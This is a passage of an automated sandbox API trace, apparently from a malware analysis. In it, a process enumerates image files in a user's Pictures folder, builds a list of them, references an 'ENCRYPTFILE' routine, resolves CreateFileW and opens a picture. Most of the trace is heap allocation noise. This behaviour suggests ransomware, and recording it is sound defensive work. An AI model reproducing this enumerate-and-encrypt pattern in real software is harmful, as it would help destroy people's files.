lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed3ce30, ftCreationTime.dwHighDateTime=0x1d5ee91, ftLastAccessTime.dwLowDateTime=0xefa98900, ftLastAccessTime.dwHighDateTime=0x1d5e156, ftLastWriteTime.dwLowDateTime=0xefa98900, ftLastWriteTime.dwHighDateTime=0x1d5e156, nFileSizeHigh=0x0, nFileSizeLow=0x1880d, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="h5_ZfAY-6STnb.gif", cAlternateFileName="H5_ZFA~1.GIF")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789db490, ftCreationTime.dwHighDateTime=0x1d5e3fd, ftLastAccessTime.dwLowDateTime=0x350e5ad0, ftLastAccessTime.dwHighDateTime=0x1d5e336, ftLastWriteTime.dwLowDateTime=0x350e5ad0, ftLastWriteTime.dwHighDateTime=0x1d5e336, nFileSizeHigh=0x0, nFileSizeLow=0x1297e, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="i5q_5Bq6.bmp", cAlternateFileName="")) returned 1 [0086.383] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24491a80, ftCreationTime.dwHighDateTime=0x1d5e8ab, ftLastAccessTime.dwLowDateTime=0xf883cf30, ftLastAccessTime.dwHighDateTime=0x1d5eb70, ftLastWriteTime.dwLowDateTime=0xf883cf30, ftLastWriteTime.dwHighDateTime=0x1d5eb70, nFileSizeHigh=0x0, nFileSizeLow=0xd297, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="KI1iqiSuYI.jpg", cAlternateFileName="KI1IQI~1.JPG")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x160e5c10, ftCreationTime.dwHighDateTime=0x1d5ed64, ftLastAccessTime.dwLowDateTime=0x8e696ff0, ftLastAccessTime.dwHighDateTime=0x1d5e1c1, ftLastWriteTime.dwLowDateTime=0x8e696ff0, ftLastWriteTime.dwHighDateTime=0x1d5e1c1, nFileSizeHigh=0x0, nFileSizeLow=0x3e7a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="kr_O D2ok83jLZ-Nq.jpg", cAlternateFileName="KR_OD2~1.JPG")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22963900, ftCreationTime.dwHighDateTime=0x1d5eadd, ftLastAccessTime.dwLowDateTime=0x64985a50, ftLastAccessTime.dwHighDateTime=0x1d5eb68, ftLastWriteTime.dwLowDateTime=0x64985a50, ftLastWriteTime.dwHighDateTime=0x1d5eb68, nFileSizeHigh=0x0, nFileSizeLow=0x3a40, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="qBLfci.gif", cAlternateFileName="")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48e0f0e0, ftCreationTime.dwHighDateTime=0x1d5e9a3, ftLastAccessTime.dwLowDateTime=0x913d65f0, ftLastAccessTime.dwHighDateTime=0x1d5e47e, ftLastWriteTime.dwLowDateTime=0x913d65f0, ftLastWriteTime.dwHighDateTime=0x1d5e47e, nFileSizeHigh=0x0, nFileSizeLow=0x1744a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Rk8a.png", cAlternateFileName="")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c02b90, ftCreationTime.dwHighDateTime=0x1d5e2ee, ftLastAccessTime.dwLowDateTime=0xa75c3350, ftLastAccessTime.dwHighDateTime=0x1d5e674, ftLastWriteTime.dwLowDateTime=0xa75c3350, ftLastWriteTime.dwHighDateTime=0x1d5e674, nFileSizeHigh=0x0, nFileSizeLow=0x167bc, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="wWIF_SR6x0w3shayx.jpg", cAlternateFileName="WWIF_S~1.JPG")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c96c10, ftCreationTime.dwHighDateTime=0x1d5ec63, ftLastAccessTime.dwLowDateTime=0x4abbb4e0, ftLastAccessTime.dwHighDateTime=0x1d5e480, ftLastWriteTime.dwLowDateTime=0x4abbb4e0, ftLastWriteTime.dwHighDateTime=0x1d5e480, nFileSizeHigh=0x0, nFileSizeLow=0x11095, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="XwG8Sj1nv9U.bmp", cAlternateFileName="XWG8SJ~1.BMP")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c7a780, ftCreationTime.dwHighDateTime=0x1d5ed1f, ftLastAccessTime.dwLowDateTime=0xa20a2780, ftLastAccessTime.dwHighDateTime=0x1d5eb16, ftLastWriteTime.dwLowDateTime=0xa20a2780, ftLastWriteTime.dwHighDateTime=0x1d5eb16, nFileSizeHigh=0x0, nFileSizeLow=0xfa89, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="YwIpia.gif", cAlternateFileName="")) returned 1 [0086.384] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2170, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x16, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3564, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ﱰмńဓ+\x10")) returned 0 [0086.384] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0086.384] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|0Vl-GMFm9nq0tPej.bmp|5MOGH3JqsJ.bmp|9TpncYB524P.bmp|BWdI74zS0.bmp|desktop.ini|eY_MSASCT-tpPguP.bmp|fW_IRtjvKhZB-.bmp|GbOsv53gLsdhP15shLc.jpg|h5_ZfAY-6STnb.gif|i5q_5Bq6.bmp|KI1iqiSuYI.jpg|kr_O D2ok83jLZ-Nq.jpg|qBLfci.gif|Rk8a.png|wWIF_SR6x0w3shayx.jpg|XwG8Sj1nv9U.bmp|YwIpia.gif", cchCount1=278, lpString2="", cchCount2=0) returned 3 [0086.384] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0086.384] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da9ae0, ftCreationTime.dwHighDateTime=0x1d5ef3a, ftLastAccessTime.dwLowDateTime=0x802e2550, ftLastAccessTime.dwHighDateTime=0x1d5eeca, ftLastWriteTime.dwLowDateTime=0x802e2550, ftLastWriteTime.dwHighDateTime=0x1d5eeca, nFileSizeHigh=0x0, nFileSizeLow=0xc7e0, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="0Vl-GMFm9nq0tPej.bmp", cAlternateFileName="0VL-GM~1.BMP")) returned 0x41ac740 [0086.385] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0086.385] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0086.385] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0086.385] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0086.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca3d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0086.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0086.386] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0086.386] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\0Vl-GMFm9nq0tPej.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\0vl-gmfm9nq0tpej.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0086.387] FreeLibrary (hLibModule=0x772d0000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0086.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0086.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0086.390] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.390] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0086.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0086.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.391] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0086.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0086.391] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0086.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0086.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0086.393] HeapFree (in: 